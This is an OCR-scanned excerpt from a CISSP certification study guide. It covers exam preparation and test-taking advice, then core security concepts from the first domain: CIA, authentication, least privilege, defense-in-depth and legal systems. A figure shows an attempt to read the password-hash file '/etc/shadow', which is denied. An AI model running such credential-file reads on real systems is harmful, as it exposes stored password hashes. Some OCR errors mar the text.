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CHAPTER 


Introduction 


EXAM OBJECTIVES IN THIS CHAPTER 

• How to Prepare for the Exam 

• How to Take the Exam 

• Good Luck! 

This book is bom out of real-world information security industry experience. The 
authors of this book have held the titles of systems administrator, systems program- 
mer, network engineer/security engineer, security director, H1PAA security officer, 
ISSO, security consultant, instructor, and others. 

This book is also born out of real-world instruction. We have logged countless 
road miles teaching information security classes to professionals around the world. 
We have taught thousands of students in hundreds of classes: both physically on 
most of the continents, as well as online. Classes include CISSP®, of course, but also 
continuous monitoring, hunt teaming, penetration testing, security essentials, hacker 
techniques, information assurance boot camps, and others. 

Good instmctors know that students have spent time and money to be with them, and 
time can be the most precious. We respect our students and their time: we do not waste 
it. We teach our students what they need to know, and we do so as efficiently as possible. 

This book is also a reaction to other books on the same subject. As the years have 
passed, other books’ page counts have grown, often past 1000 pages. As Larry Wall 
once said, “There is more than one way to do it.” [1] Our experience tells us that there 
is another way. If we can teach someone with the proper experience how to pass the 
CISSP® exam in a 6-day boot camp, is a 1000+ page CISSP® book really necessary? 

We asked ourselves: what can we do that has not been done before? What can we 
do better or differently? Can we write a shorter book that gets to the point, respects 
our student’s time, and allows them to pass the exam? 

We believe the answer is yes; you are reading the result. We know what is impor- 
tant, and we will not waste your time. We have taken Strunk and White’s advice to 
“omit needless words” [2] to heart: it is our mantra. 

This book will teach you what you need to know, and do so as concisely as 
possible. 
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CHAPTER 1 Introduction 


HOW TO PREPARE FOR THE EXAM 

Read this book, and understand it: all of it. If we cover a subject in this book, we 
are doing so because it is testable (unless noted otherwise). The exam is designed to 
test your understanding of the Common Body of Knowledge, which may be thought 
of as the universal language of information security professionals. It is said to be “a 
mile wide and two inches deep.” Formal terminology is critical: pay attention to it. 

The Common Body of Knowledge is updated occasionally, most recently in April 
2015. This book has been updated to fully reflect the 2015 CBK. The (ISC) 2 ® Can- 
didate Information Bulletin (CIB) describes the current version of the exam; down- 
loading and reading the CIB is a great exam preparation step. You may download 
it here: https://www.isc2. org/uploadedfiles/(isc)2_public_content/exam_outlines/ 
cissp-exam-outline-april-20 1 5 .pdf 

Learn the acronyms in this book and the words they represent, backwards and 
forwards. Both the glossary and index of this book are highly detailed, and map from 
acronym to name. We did this because it is logical for a technical book, and also to 
get you into the habit of understanding acronyms forwards and backwards. 

Much of the exam question language can appear unclear at times: formal terms 
from the Common Body of Knowledge can act as a beacon to lead you through the 
more difficult questions, highlighting the words in the question that really matter. 


THE CISSP® EXAM IS A MANAGEMENT EXAM 

Never forget that the CISSP® exam is a management exam: answer all questions 
as an information security manager would. Many questions are fuzzy and provide 
limited background: when asked for the best answer, you may think: “it depends.” 

Think and answer like a manager. For example: the exam states you are concerned 
with network exploitation. If you are a professional penetration tester you may won- 
der: am I trying to launch an exploit, or mitigate one? What does “concerned” mean? 

Your CSO is probably trying to mitigate network exploitation, and that is how 
you should answer on the exam. 

THE 2015 UPDATE 

The 2015 exam moved to 8 domains of knowledge (down from 10). Lots of content 
was moved. The domain content can seem jumbled at times: the concepts do not 
always flow logically from one to the next. Some domains are quite large, while 
others are small. In the end this is a non-issue: you will be faced with 250 questions 
from the 8 domains, and the questions will not overtly state the domain they are 
based on. 

The 2015 update focused on adding more up-to-date technical content, including an 
emphasis on cloud computing, the Internet of Things (IoT) and Content Distribution Net- 
works (CDN), as well as other modem technical topics. Even DevOps was added, which 
is quite a spin on the pre-2015 “exam way” concerning best practices for development. 


How to Prepare for the Exam 
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THE NOTES CARD APPROACH 

As you are studying, keep a “notes card” file for highly specific information that 
does not lend itself to immediate retention. A notes card is simply a text file (you can 
create it with a simple editor like WordPad) that contains a condensed list of 
detailed information. 

Populate your notes card with any detailed information (which you do not already 
know from previous experience) which is important for the exam, like the five levels 
of the Software Capability Maturity Level (CMM; covered in Chapter 9, Domain 8: 
Software Development Security), or the ITSEC and Common Criteria Levels 
(covered in Chapter 4, Domain 3: Security Engineering), for example. 

The goal of the notes card is to avoid getting lost in the “weeds”: drowning in 
specific information that is difficult to retain on first sight. Keep your studies focused 
on core concepts, and copy specific details to the notes card. When you are done, 
print the file. As your exam date nears, study your notes card more closely. In the 
days before your exam, really focus on those details. 

PRACTICE TESTS 

Quizzing can be the best way to gauge your understanding of this material, and of 
your readiness to take the exam. A wrong answer on a test question acts as a laser 
beam: showing you what you know, and more importantly, what you do not know. 
Each chapter in this book has 15 practice test questions at the end, ranging from easy 
to medium to hard. The Self Test Appendix includes explanations for all correct and 
incorrect answers; these explanations are designed to help you understand why the 
answers you chose were marked correct or incorrect. This book’s companion Web 
site is located at http://booksite.elsevier.com/companion/conrad/index.php. It con- 
tains 500 questions: two full practice exams. Use them. 

You should aim for 80% or greater correct answers on any practice test. The real 
exam requires 700 out of 1000 points, but achieving 80% or more on practice tests 
will give you some margin for error. Take these quizzes closed book, just as you will 
take the real exam. Pay careful attention to any wrong answers, and be sure to reread 
the relevant section of this book. Identify any weaker domains (we all have them): 
domains where you consistently get more wrong answers than others. Then focus 
your studies on those weak areas. 

Time yourself while taking any practice exam. Aim to answer at a rate of at least 
one question per minute. You need to move faster than true exam pace because the 
actual exam questions may be more difficult and therefore take more time. If you are 
taking longer than that, practice more to improve your speed. Time management is 
critical on the exam, and running out of time usually equals failure. 

READ THE GLOSSARY 

As you wrap up your studies, quickly read through the glossary towards the back of 
this book. It has over 1000 entries, and is highly detailed by design. The glossary 
definitions should all be familiar concepts to you at this point. 
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If you see a glossary definition that is not clear or obvious to you, go back to the 
chapter it is based on, and reread that material. Ask yourself: do I understand this 
concept enough to answer a question about it? 

READINESS CHECKLIST 

These steps will serve as a “readiness checklist” as you near the exam day. If 
you remember to think like a manager, are consistently scoring over 80% on 
practice tests, are answering practice questions quickly, understand all glossary 
terms, and perform a final thorough read through of your notes card, you are ready 
to go. 


HOW TO TAKE THE EXAM 

The CISSP® exam was traditionally taken via paper-based testing: old-school paper- 
and-pencil. This has now changed to computer-based testing (CBT), which we will 
discuss shortly. 

The exam has 250 questions, with a 6-hour time limit. Six hours sounds like 
a long time, until you do the math: 250 questions in 360 minutes leaves less than a 
minute and a half to answer each question. The exam is long and can be grueling; it 
is also a race against time. Preparation is the key to success. 


STEPS TO BECOMING A CISSP® 

Becoming a CISSP® requires four steps: 

• Proper professional information security experience 

• Agreeing to the (ISC) 2 ® code of ethics 

• Passing the CISSP® exam 

• Endorsement by another CISSP® 

Additional details are available on the examination registration form available at 

https://www.isc2.org. 

The exam currently requires 5 years of professional experience in 2 or more of 
the 8 domains of knowledge. Those domains are covered in chapters 2-9 of this 
book. You may waive 1 year with a college degree or approved certification; see the 
examination registration form for more information. 

You may pass the exam before you have enough professional experience and 
become an “Associate of (ISC) 2 ®.” Once you meet the experience requirement, you 
can then complete the process and become a CISSP®. 

The (ISC) 2 ® code of ethics is discussed in Chapter 2, Domain 1 : Security and 
Risk Management. 

Passing the exam is discussed in section “How to Take the Exam,” and we dis- 
cuss endorsement in section “After the Exam” below. 


How to Take the Exam 
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COMPUTER BASED TESTING (CBT) 

(ISC) 2 ® has partnered with Pearson VUE (http://www.pearsonvue.com/) to provide 
computer-based testing (CBT). Pearson VUE has testing centers located in over 160 
countries around the world; go to their website to schedule your exam. Note that the 
information regarding CBT is subject to change: please check the (ISC) 2 ® CBT site 
(https://www.isc2.org/cbt/default.aspx) for any updates to the CBT process. 

According to (ISC) 2 ®, “Candidates will receive their unofficial test result at 
the test center. The results will be handed out by the Test Administrator during the 
checkout process. (ISC) 2 will then follow up with an official result via email. In 
some instances, real time results may not be available. A comprehensive statistical 
and psychometric analysis of the score data is conducted during every testing cycle 
before scores are released.” [3] This normally occurs when the exam changes: 
students who took the updated exam in April and May of 2015 reported a 6- week 
wait before they received their results. Immediate results followed shortly after 
that time. 

Pearson VUE’s (ISC) 2 ® site is: http://www.pearsonvue.com/isc2/. It includes 
useful resources, including the “Pearson VUE Testing Tutorial and Practice Exam,” 
a Microsoft Windows application that allows candidates to try out a demo exam, 
explore functionality, test the “Flag for Review” function, etc. This can help reduce 
exam-day jitters, and familiarity with the software can also increase your test taking 
speed. 

HOW TO TAKE THE EXAM 

The exam has 250 questions comprised of four types: 

• Multiple choice 

• Scenario 

• Drag/drop 

• Hotspot 

Multiple-choice questions have four possible answers, lettered A, B, C, or D. 
Each multiple-choice question has exactly one correct answer. A blank answer is a 
wrong answer: guessing does not hurt you. 

Scenario questions contain a long paragraph of information, followed by a num- 
ber of multiple choice questions based on the scenario. The questions themselves are 
multiple choice, with one correct answer only, as with other multiple choice ques- 
tions. The scenario is often quite long, and contains unnecessary information. It is 
often helpful to read the scenario questions first: this method will provide guidance 
on keywords to look for in the scenario. 

Drag & drop questions are visual multiple choice questions that may have mul- 
tiple correct answers. Figure 1.1 is an example from Chapter 2, Domain 1 : Security 
and Risk Management. 

Drag and drop: Identify all objects listed below. Drag and drop all objects from 
left to right. 
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Possible Answers Correct Answers 


/ \ 

Readme.txt file 





Authenticated 

user 


FIGURE 1.1 Sample Drag & Drop Question 


As we will learn in Chapter 2, Domain 1 : Security and Risk Management, passive 
data such as physical files, electronic files and database tables are objects. Subjects 
are active, such as users and running processes. Therefore you would drag the objects 
to the right, and submit the answers, as shown in Figure 1.2. 

Hotspot questions are visual multiple choice questions with one answer. They 
will ask you to click on an area on an image; network maps are a common example. 
Figure 1.3 shows a sample Hotspot question. 

You plan to implement a single firewall that is able to filter trusted, untrusted, and 
DMZ traffic. Where is the best location to place this firewall? 

As we will learn in Chapter 5. The single firewall DMZ design requires a fire- 
wall that can filter traffic on three interfaces: untrusted, (the Internet), trusted, and 
DMZ. It is best placed as shown in Figure 1 .4: (ISC) 2 ® has sample examples of both 
Drag & Drop and Hotspot questions available at: https://isc2.org/innovative-cissp- 
questions/default.aspx. 

The questions will be mixed from the 8 domains; the questions do not (overtly) 
state the domain they are based on. There are 25 research questions (10% of the 
exam) that do not count towards your final score. These questions are not marked: 
you must answer all 250 questions as if they count. 

Scan all questions for the key words, including formal Common Body of Knowl- 
edge terms. Acronyms are your friend: you can identify them quickly, and they are 
often important (if they are formal terms). Many words may be “junk” words, placed 
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Possible Answers Correct Answers 


C \ 

Running login 
process 

v / 


' > 

Authenticated 
user 

v. / 


FIGURE 1.2 Sample Drag & Drop Answer 


Readme.txt file 


Database Table 


f \ 

1099 Tax Form 
s > 


Web Server 


Email Server 



The Internet T rusted Network 

FIGURE 1.3 Sample Hotspot Question 
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Web Server Email Server 



there to potentially confuse you: ignore them. Pay careful attention to small words 
that may be important, such as “not.” 

The Two Pass Method 

There are two successful methods for taking the exam: the two-pass method and the 
three-pass method. Both begin the same way: 

Pass One 

Answer all questions that you can answer quickly (e.g., in less than 2 minutes). You 
do not need to watch the clock; your mind’s internal clock will tell you roughly when 
you have been stuck on a question longer than that. If you are close to determining 
an answer, stick with it. If not, skip the question (or provide a quick answer), and 
flag the question for later review. This helps manage time: you do not want to run 
out of time (e.g., miss the last 10 questions because you spent 20 minutes stuck on 
question 77). 

Pass Two 

You will hopefully have time left after pass one. Go back over any flagged ques- 
tions and answer them all. When you complete pass two, all 250 questions will be 
answered. 

Pass two provides a number of benefits, beyond time management. Anyone who 
has been stuck on a crossword puzzle, put it down for 20 minutes, and picked it up to 
have answers suddenly appear obvious understands the power of the human mind’s 
“background processes.” Our minds seem to chew on information, even as we are not 
consciously aware of this happening. Use this to your advantage. 


Good Luck! 
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A second benefit is the occasional “covert channel” that may exist between ques- 
tions on the exam. Question 132 asks you what port SSH (Secure Shell) daemon 
listens on, for example. Assume you do not know the answer, and then question 204 
describes a scenario that mentions SSH runs on TCP port 22. Question 132 is now 
answered. This signaling of information will not necessarily be that obvious, but you 
can often infer information about one answer based on a different question; also use 
this to your advantage. 

The Three Pass Method 

There is an optional (and controversial) third pass: recheck all your answers, ensur- 
ing you understood and answered the question properly. This is to catch mistakes 
such as missing a keyword, for example, “Which of the following physical devices 
is not a recommended preventive control?” You read that question, and missed the 
word “not.” You answered the question on the wrong premise, and gave a recom- 
mended device (like a lock), when you should have done the opposite, and recom- 
mended a detective device such as closed-circuit television (CCTV). 

The third pass is designed to catch those mistakes. This method is controver- 
sial because people often second-guess themselves, and change answers to questions 
they properly understood. Your first instinct is usually your best: if you use the third- 
pass method, avoid changing these kinds of answers. 


AFTER THE EXAM 

If you pass, you will not know your score; if you fail, you will receive your score, 
as well as a rating of domains from strongest to weakest. If you do fail, use that list 
to hone your studies, focusing on your weak domains. Then retake the exam. Do not 
let a setback like this prevent you from reaching your goal. We all suffer adversity 
in our lives: how we respond is what is really important. The exam’s current retake 
policy is, “Test takers who do not pass the exam the first time will be able to retest 
after 30 days. Test takers that fail a second time will need to wait 90 days prior to 
sitting for the exam again. In the unfortunate event that a candidate fails a third time, 
the next available time to sit for the exam will be 1 80 days after the most recent exam 
attempt. Candidates are eligible to sit for (ISC) 2 exams a maximum of 3 times within 
a calendar year.” [4] 

Once you pass the exam, you will need to be endorsed by another CISSP® before 
earning the title “CISSP®”; (ISC) 2 ® will explain this process to you in the email 
they send with your passing results. 


GOOD LUCK! 

We live in an increasingly certified world, and information security is growing into 
a full profession. Becoming a CISSP® can provide tremendous career benefits, as it 
has for the authors of this book. 
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The exam is not easy, but worthwhile things rarely are. Investing in an appreciat- 
ing asset is always a good idea: you are investing in yourself. Good luck; we look 
forward to welcoming you to the club ! 
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CHAPTER 


Domain 1: Security 
and Risk Management 
(e.g., Security, Risk, 
Compliance, Law, 
Regulations, Business 
Continuity) 



EXAM OBJECTIVES IN THIS CHAPTER 

• Cornerstone Information Security Concepts 

• Legal and Regulatory Issues 

• Security and 3 rd Parties 

• Ethics 

• Information Security Governance 

• Access Control Defensive Categories and Types 

• Risk Analysis 

• Types of Attackers 


UNIQUE TERMS AND DEFINITIONS 

• Confidentiality - seeks to prevent the unauthorized disclosure of information: it 
keeps data secret 

• Integrity - seeks to prevent unauthorized modification of information. In other 
words, integrity seeks to prevent unauthorized write access to data. Integrity 
also seeks to ensure data that is written in an authorized manner is complete and 
accurate. 

• Availability - ensures that information is available when needed 

• Subject - An active entity on an information system 

• Object - A passive data file 

• Annualized Loss Expectancy — the cost of loss due to a risk over a year 

• Threat — a potentially negative occurrence 

• Vulnerability — a weakness in a system 

• Risk — a matched threat and vulnerability 

• Safeguard — a measure taken to reduce risk 
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CHAPTER 2 Doma in 1: Security and Risk Management 


• Total Cost of Ownership — the cost of a safeguard 

• Return on Investment — money saved by deploying a safeguard 


INTRODUCTION 

Our job as information security professionals is to evaluate risks against our critical 
assets and deploy safeguards to mitigate those risks. We work in various roles: fire- 
wall engineers, penetration testers, auditors, management, etc. The common thread 
is risk: it is part of our job description. 

The Security and Risk Management domain focuses on risk analysis and mitiga- 
tion. This domain also details security governance, or the organizational structure 
required for a successful information security program. The difference between 
organizations that are successful versus those that fail in this realm is usually not tied 
to dollars or size of staff: it is tied to the right people in the right roles. Knowledgeable 
and experienced information security staff with supportive and vested leadership is 
the key to success. 

Speaking of leadership, learning to speak the language of your leadership is 
another key to personal success in this industry. The ability to effectively communicate 
information security concepts with C-level executives is a rare and needed skill. This 
domain will also help you to speak their language by discussing risk in terms such as 
Total Cost of Ownership (TCO) and Return oil Investment (ROI). 


CORNERSTONE INFORMATION SECURITY CONCEPTS 

Before we can explain access control we must define cornerstone information secu- 
rity concepts. These concepts provide the foundation upon which the 8 domains of 
the Common Body of Knowledge are built. 


NOTE 

Cornerstone information security concepts will be repeated throughout this book. This repetition 
is by design: we introduce the concepts at the beginning of the first domain, and then reinforce 
them throughout the later domains, while focusing on issues specific to that domain. If you do not 
understand these cornerstone concepts, you will not pass the exam. 


CONFIDENTIALITY, INTEGRITY AND AVAILABILITY 

Confidentiality, Integrity, and Availability are referred to as the “CIA triad,” the cor- 
nerstone concept of information security. The triad, shown in Figure 2.1, form the 
three-legged stool information security is built upon. The order of the acronym may 
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change (some prefer “AIC,” perhaps to avoid association with a certain intelligence 
agency), which is not important: understanding each concept is critical. This book 
will use the “CIA” acronym. 

All three pieces of the CIA triad work together to provide assurance that data and 
systems remain secure. Do not assume that one part of the triad is more important 
than another. Every IT system will require a different prioritization of the three, 
depending on the data, user community, and timeliness required for accessing the 
data. There are opposing forces to CIA. As shown in Figure 2.2, those forces are 
disclosure, alteration, and destruction (DAD). 

Confidentiality 

Confidentiality seeks to prevent the unauthorized disclosure of information: it keeps 
data secret. In other words, confidentiality seeks to prevent unauthorized read access 
to data. An example of a confidentiality attack would be the theft of Personally Iden- 
tifiable Information (PII), such as credit card information. 



FIGURE 2.1 The CIA Triad 


c 



FIGURE 2.2 Disclosure, Alteration and Destruction 
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Data must only be accessible to users who have the clearance, formal access 
approval, and the need to know. Many nations share the desire to keep their national 
security information secret and accomplish this by ensuring that confidentiality 
controls are in place. 

Large and small organizations need to keep data confidential. One U.S. law, the 
Health Insurance Portability and Accountability Act (HIPAA), requires that medical 
providers keep the personal and medical information of their patients private. Can 
you imagine the potential damage to a medical business if patients’ medical and per- 
sonal data were somehow released to the public? That would not only lead to a loss 
in confidence but could expose the medical provider to possible legal action by the 
patients or government regulators. 

Integrity 

Integrity seeks to prevent unauthorized modification of information. In other words, 
integrity seeks to prevent unauthorized write access to data. 

There are two types of integrity: data integrity and system integrity. Data integrity 
seeks to protect information against unauthorized modification; system integrity seeks 
to protect a system, such as a Windows 2008 server operating system, from unauthor- 
ized modification. If an unethical student compromises a college grade database to raise 
his failing grades, he has violated the data integrity. If he installs malicious software 
on the system to allow future “back door” access, he has violated the system integrity. 

Availability 

Availability ensures that information is available when needed. Systems need to 
be usable (available) for normal business use. An example of attack on availability 
would be a Denial of Service (DoS) attack, which seeks to deny service (or avail- 
ability) of a system. 

Tension Between the Concepts 

Confidentiality, integrity, and availability are sometimes at opposition: locking your 
data in a safe and throwing away the key may help confidentiality and integrity, but 
harms availability. That is the wrong answer: our mission as information security 
professionals is to balance the needs of confidentiality, integrity, and availability, and 
make tradeoffs as needed. One sure sign of an information security rookie is throw- 
ing every confidentiality and integrity control at a problem, while not addressing 
availability. Properly balancing these concepts, as shown in Figure 2.3, is not easy, 
but worthwhile endeavors rarely are. 

Disclosure, Alteration and Destruction 

The CIA triad may also be described by its opposite: Disclosure, Alteration, and 
Destruction (DAD). Disclosure is unauthorized release of information; alteration is 
the unauthorized modification of data, and destruction is making systems or data 
unavailable. While the order of the individual components of the CIA acronym some- 
times changes, the DAD acronym is shown in that order. 
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FIGURE 2.3 Balancing the CIA Triad 


IDENTITY AND AUTHENTICATION, AUTHORIZATION 
AND ACCOUNTABILITY (AAA) 

The term “AAA” is often used to describe the cornerstone concepts Authentication, 
Authorization, and Accountability. Left out of the AAA acronym is Identification 
(which is required, before the remaining three “A’s” can be achieved). 

Identity and Authentication 

Identity is a claim: if your name is “Person X,” you identify yourself by saying “I 
am Person X.” Identity alone is weak because there is no proof. You can also identify 
yourself by saying “I am Person Y.” Proving an identity claim is called authentica- 
tion: you authenticate the identity claim, usually by supplying a piece of information 
or an object that only you possess, such as a password in the digital world, or your 
passport in the physical world. 

When you check in at the airport, the ticket agent asks for your name (your iden- 
tity). You can say anything you would like, but if you lie you will quickly face a 
problem: the agent will ask for your driver’s license or passport. In other words, they 
will seek to authenticate your identity claim. 

Figure 2.4 shows the relationship between identity and authentication. User 
Deckard logs into his email account at ericconrad.com. He types “deckard” in the 
username box; this is his identity on the system. Note that Deckard could type any- 
thing in the Username box: identification alone is weak. It requires proof, which is 
authentication. Deckard then types a password “R3plicant!” This is the correct pass- 
word for the user Deckard at ericconrad.com, so Deckard’ s identity claim is proven 
and he is logged in. 

Identities must be unique: if two employees are named John Smith, their user- 
names (identities) cannot both be jsmith: this would harm accountability. Sharing 
accounts (identities) also harms accountability: policy should forbid sharing 
accounts, and security awareness should be conducted to educate users of this risk. 
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Less spam, plenty of spaa 


Sign in to your account at 


EricCor ■' 



Welcome to your email for EricCc 


Username: deckard 


Password: 


0 Stay signed in 


Sign in 


Can't access vour account? 


FIGURE 2.4 Identification and Authentication 


Ideally, usernames should be non-descriptive. The example username “jsmith” 
is a descriptive username: an attacker could guess the username by simply know- 
ing the user’s actual name. This would provide one half (a valid identity) of the 
information required to launch a successful password guessing attack (the second 
half is jsmith’ s password, required to authenticate). A non-descriptive identity 
of “bconl203” would make password-guessing attacks (and many other types of 
attacks) more difficult. 

Authorization 

Authorization describes the actions you can perform on a system once you have been 
identified and authenticated. Actions may include reading, writing, or executing files 
or programs. If you are an information security manager for a company with a human 
resources database, you may be authorized to view your own data and perhaps some 
of your employees’ data (such as accrued sick time or vacation time). You would not 
be authorized to view the CIO’s salary. 

Figure 2.5 shows authorization using an Ubuntu Linux system. User Deckard 
has identified and authenticated himself, and logged into the system. He uses the 
Linux “cat” command to view the contents of “sebastian-address.txt.” Deckard is 
authorized to view this file, so permission is granted. Deckard then tries to view 
the file “/etc/shadow,” which stores the users’ password hashes. Deckard is not 
authorized to view this file, and permission is denied. 

Accountability 

Accountability holds users accountable for their actions. This is typically done by 
logging and analyzing audit data. Enforcing accountability helps keep “honest peo- 
ple honest.” For some users, knowing that data is logged is not enough to provide 
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deckard@ubuntu: — 


File Edit View Terminal Help 
deckard@ubuntu:~$ cat sebastian-address.txt 
J.F. Sebastian 
Bradbury Apartments 
Ninth Sector 
N.F. 46751 

deckard@ubuntu:~$ cat /etc/shadow 
cat: /etc/shadow: Permission denied 
deckard@ubuntu:~$ | 


FIGURE 2.5 Linux File Authorization 
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Not Authorized 
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Authorized 
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accountability: they must know that the data is logged and audited, and that sanctions 
may result from violation of policy. 

The healthcare company Kaiser Permanente enforced accountability in 2009 
when it fired or disciplined over 20 workers for violating policy (and possibly violat- 
ing regulations such as HIPAA) by viewing Nadya Suleman’s (aka the Octomom) 
medical records without a need to know. See http://www.scmagazineus.com/octo- 
moms-hospital-records-accessed-15-workers-hred/article/129820/ for more details. 
Logging that data is not enough: identifying violations and sanctioning the violators 
is also required. 

NON-REPUDIATION 

Non-repudiation means a user cannot deny (repudiate) having performed a trans- 
action. It combines authentication and integrity: non-repudiation authenticates the 
identity of a user who performs a transaction, and ensures the integrity of that trans- 
action. You must have both authentication and integrity to have non-repudiation: 
proving you signed a contract to buy a car (authenticating your identity as the pur- 
chaser) is not useful if the car dealer can change the price from $20,000 to $40,000 
(violate the integrity of the contract). 

LEAST PRIVILEGE AND NEED TO KNOW 

Least privilege means users should be granted the minimum amount of access 
(authorization) required to do their jobs, but no more. Need to know is more granular 
than least privilege: the user must need to know that specific piece of information 
before accessing it. 

Sebastian is a nurse who works in a medical facility with multiple practices. His 
practice has four doctors, and Sebastian could treat patients for any of those four doc- 
tors. Least privilege could allow Sebastian to access the records of the four doctors’ 
patients, but not access records for patients of other doctors in other practices. 
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Need to know means Sebastian can access a patient’s record only if he has a busi- 
ness need to do so. If there is a patient being treated by Sebastian’s practice, but not 
by Sebastian himself, least privilege could allow access, but need to know would not. 


LEARN BY EXAMPLE 

Real-World Least Privilege 

A large healthcare provider had a 60-member IT staff responsible for 4000 systems running 
Microsoft Windows. The company did not employ least privilege: the entire IT staff was granted 
Windows Domain Administrator access. Staff with such access included help desk personnel, 
backup administrators, and many others. All 60 domain administrators had super-user privileges on 
all 4000 windows systems. 

This level of privilege was excessive and led to problems. Operator errors led to violation of 
CIA. Because so many could do so much, damage to the environment was prevalent. Data was lost; 
unauthorized changes were made; systems crashed, and it was difficult to pinpoint the causes. 

A new security officer was hired, and one of his first tasks was to enforce least privilege. Role- 
based accounts were created: a help desk role that allowed access to the ticketing system, a backup 
role that allowed backups and restoration, and so on. The domain administrator list was whittled 
down to a handful of authorized personnel. 

Many former domain administrators complained about loss of super-user authorization, but 
everyone got enough access to do their job. The improvements were immediate and impressive: 
unauthorized changes virtually stopped and system crashes became far less common. Operators still 
made mistakes, but those mistakes were far less costly. 


SUBJECTS AND OBJECTS 

A subject is an active entity on a data system. Most examples of subjects involve 
people accessing data files. However, computer programs can be subjects as well. 
A Dynamic Link Library file or a Perl script that updates database files with new 
information is also a subject. 

An object is any passive data within the system. Objects can range from 
documents on physical paper, to database tables to text files. The important thing 
to remember about objects is that they are passive within the system. They do not 
manipulate other objects. 

There is one tricky example of subjects and objects that is important to under- 
stand. For example, if you are running iexplore.exe (Internet Explorer browser 
on a Microsoft Windows system), it is a subject while running in memory. When 
the browser is not running in memory, the file iexplore.exe is an object on the 
filesystem. 


EXAM WARNING 


Keep all examples on the CISSP® exam simple by determining whether they fall into the definition 
of a subject or an object. 
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DEFENSE-IN-DEPTH 

Defense-in-Depth (also called layered defenses) applies multiple safeguards (also 
called controls: measures taken to reduce risk) to protect an asset. Any single security 
control may fail; by deploying multiple controls, you improve the confidentiality, 
integrity, and availability of your data. 


LEARN BY EXAMPLE 

Defense-in-Depth Malware Protection 

A 12,000-employee company received 250,000 Internet emails per day. The vast majority of these 
emails were malicious, ranging from time- and resource-wasting spam, to malware such as worms 
and viruses. Attackers changed tactics frequently, always trying to evade safeguards designed to 
keep the spam and malware out. 

The company deployed preventive defense-in-depth controls for Internet email-based 
malware protection. One set of UNIX mail servers filtered the incoming Internet email, each 
running two different auto-updating antivirus/antimalware solutions by two different major 
vendors. Mail that scanned clean was then forwarded to an internal Microsoft Exchange mail 
server, which ran yet another vendor’s antivirus software. Mail that passed that scan could reach 
a user’s client, which ran a fourth vendor’s antivirus software. The client desktops and laptops 
were also fully patched. 

Despite those safeguards, a small percentage of malware successfully evaded four different 
antivirus checks and infected the users’ client systems. Fortunately, the company deployed 
additional defense-in-depth controls, such as Intrusion Detection Systems (IDSs), incident handling 
policies, and a CIRT ( Computer Incident Response Team ) to handle incidents. These defensive 
measures successfully identified infected client systems, allowing for timely response. 

All controls can fail, and sometimes multiple controls will fail. Deploying a range of different 
defense-in-depth safeguards in your organization lowers the chance that all controls will fail. 


DUE CARE AND DUE DILIGENCE 

Due care is doing what a reasonable person would do. It is sometimes called the 
“prudent man” rule. The term derives from “duty of care”: parents have a duty to care 
for their children, for example. Due diligence is the management of due care. 

Due care and due diligence are often confused; they are related, but different. 
Due care is informal; due diligence follows a process. Think of due diligence as a 
step beyond due care. Expecting your staff to keep their systems patched means you 
expect them to exercise due care. Verifying that your staff has patched their systems 
is an example of due diligence. 

Gross Negligence 

Gross negligence is the opposite of due care. It is a legally important concept. If 
you suffer loss of PII, but can demonstrate due care in protecting the PII, you are on 
legally stronger ground, for example. If you cannot demonstrate due care (you were 
grossly negligent), you are in a much worse legal position. 
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LEGAL AND REGULATORY ISSUES 

Though general understanding of major legal systems and types of law is important, 
it is critical that information security professionals understand the concepts described 
in the next section. With the ubiquity of information systems, data, and applications 
comes a host of legal issues that require attention. Examples of legal concepts affecting 
information security include: crimes being committed or aided by computer systems, 
attacks on intellectual property, privacy concerns, and international issues. 

COMPLIANCE WITH LAWS AND REGULATIONS 

Complying with laws and regulations is a top information security management pri- 
ority: both in the real world and on the exam. An organization must be in compliance 
with all laws and regulations that apply to it. Ignorance of the law is never a valid 
excuse for breaking the law. Details of specific laws are covered in Chapter 10: 
Domain 9: Legal, Regulations, Investigations, and Compliance. 


EXAM WARNING 


The exam will hold you to a very high standard in regard to compliance with laws and regulations. 
We are not expected to know the law as well as a lawyer, but we are expected to know when to 
call a lawyer. Confusing the technical details of a security control such as Kerberos may or may 
not cause a significant negative consequence, for example. Breaking search and seizure laws due 
to confusion over the legality of searching an employee’s personal property, for example, is likely 
to cause very negative consequences. The most legally correct answer is often the best for the 
exam. 


MAJOR LEGAL SYSTEMS 

In order to begin to appreciate common legal concepts at work in today’s global 
economy, an understanding of the major legal systems is required. These legal sys- 
tems provide the framework that determines how a country develops laws pertaining 
to information systems in the first place. The three major systems of law are civil, 
common, and religious law. 

Civil Law (Legal System) 

The most common of the major legal systems is that of civil law, which is employed by 
many countries throughout the world. The system of civil law leverages codified laws 
or statutes to determine what is considered within the bounds of law. Though a legis- 
lative branch typically wields the power to create laws there will still exist a judicial 
branch that is tasked with interpretation of the existing laws. The most significant 
difference between civil and common law is that, under civil law, judicial precedents 
and particular case rulings do not carry the weight they do under common law. 
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Common Law 

Common law is the legal system used in the United States, Canada, the United King- 
dom, and most former British colonies, amongst others. As we can see by the short 
list above, English influence has historically been the main indicator of common 
law being used in a country. The primary distinguishing feature of common law is 
the significant emphasis on particular cases and judicial precedents as determinants 
of laws. Though there is typically also a legislative body tasked with the creation of 
new statutes and laws, judicial rulings can, at times, supersede those laws. Because of 
the emphasis on judges’ interpretations there is significant possibility that as society 
changes over time, so too can judicial interpretations change in kind. 


NOTE 

Common law is the major legal system most likely to be referenced by the CISSP® exam. 
Therefore, this chapter will focus primarily on common law, which is the basis of the United 
Kingdom’s and the United States’ legal systems. 


Religious Law 

Religious law serves as the third of the major legal systems. Religious doctrine or 
interpretation serves as a source of legal understanding and statutes. However, the 
extent and degree to which religious texts, practices, or understanding are consulted 
can vary greatly. While Christianity, Judaism, and Hinduism have all had significant 
influence on national legal systems, Islam serves as the most common source for 
religious legal systems. Though there is great diversity in its application throughout 
the world, Sharia is the term used for Islamic law and it uses the Qur’an and Hadith 
as its foundation. 

Other Systems 

Though Customary Law is not considered as important as the other major legal sys- 
tems described above, it is important with respect to information security. Customary 
law refers to those customs or practices that are so commonly accepted by a group 
that the custom is treated as a law. These practices can be later codified as laws in 
the more traditional sense, but the emphasis on prevailing acceptance of a group is 
quite important with respect to the concept of negligence, which, in turn, is important 
in information security. The concept of “best practices” is closely associated with 
Customary Law. 

Suppose an organization maintains sensitive data, but has no specific legal re- 
quirements regarding how the data must be protected. The data is later compromised. 
If it were discovered that the company did not employ firewalls, antivirus software, 
and used outdated systems to house the data, many would believe the organization 
violated, perhaps not a particular legal requirement, but accepted practices by not 
employing customary practices associated with safeguarding sensitive data. 
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CRIMINAL, CIVIL, AND ADMINISTRATIVE LAW 

